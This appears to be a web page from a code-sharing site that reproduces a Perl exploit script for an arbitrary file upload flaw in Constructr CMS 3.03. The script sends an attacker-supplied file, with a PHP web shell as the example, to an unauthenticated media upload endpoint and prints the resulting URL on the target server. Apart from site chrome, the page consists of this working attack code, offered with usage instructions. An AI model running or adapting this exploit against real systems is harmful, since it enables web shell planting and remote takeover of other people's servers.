扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 |
#!/usr/bin/env perl # Constructr CMS 3.03 Arbitrary File Upload # # Author: plucky # Email:io.plucky@gmail.com # # Vulnerable Page: /constructr/backend/media.php [line # App Download:http://sourceforge.net/projects/constructr/ # # Date: 23/03/2011 # THX TO: yawn, shrod, h473 and DoMinO use strict; use warnings; use LWP::UserAgent; use HTTP::Request::Common qw( POST ); my $host = ''; my $file_to_upload = ''; my $new_file_name= ''; my $file_extension = ''; sub exploit_usage { print 'Constructr CMS 3.03 Arbitrary File Upload'. "\n". '-------------------------'. "\n". 'Author: plucky' . "\n". 'Email:io.plucky@gmail.com'. "\n". '-------------------------'. "\n". 'Usage:' . "\n". 'perl xpl.pl [host]/[cms-path]/ /[path-file]/[file]' . "\n". 'Example:' . "\n". 'perl ' . $0 . ' http://vulnerable.com/constructr/ /home/plucky/shell.php' . "\n"; exit; } sub file_parse { my $file_name = ''; my $file_extension= ''; my $file_to_upload= ''; my $rfile_to_upload = ''; $rfile_to_upload = shift; $file_to_upload= ${$rfile_to_upload}; $file_to_upload =~ m/\/([a-z0-9]+)\.([a-z]+)/i; $file_name= $1; $file_extension = $2; return ( $file_name, $file_extension ) } sub upload_file { my $host= ''; my $rhost = ''; my $file_name = ''; my $file_extension= ''; my $response= ''; my $path= ''; my $html= ''; my $user_agent= ''; my $file_to_upload= ''; my $rfile_to_upload = ''; my $new_file_name = ''; ( $rhost, $rfile_to_upload ) = @_; $host = ${$rhost}; $file_to_upload = ${$rfile_to_upload}; $user_agent = LWP::UserAgent->new; $path = $host . 'backend/media.php'; $response = $user_agent->post( $path, [ 'create_file' => 'try', 'file'=> [$file_to_upload], ], 'Content_Type' => 'form-data' ); ( $file_name, $file_extension ) = file_parse( \$file_to_upload ); $html = $response->decoded_content; $html =~ m/show_path=([a-f0-9]{32})\.$file_extension">$file_name\.$file_extension<\/a>/i; $new_file_name = $1; return ( $new_file_name, $file_extension ); } @ARGV == 2 ? ( $host, $file_to_upload ) = @ARGV : exploit_usage(); ( $new_file_name, $file_extension ) = upload_file( \$host, \$file_to_upload ); print $host, 'data/workspace/uploads/', $new_file_name, '.', $file_extension, "\n"; |
体验盒子
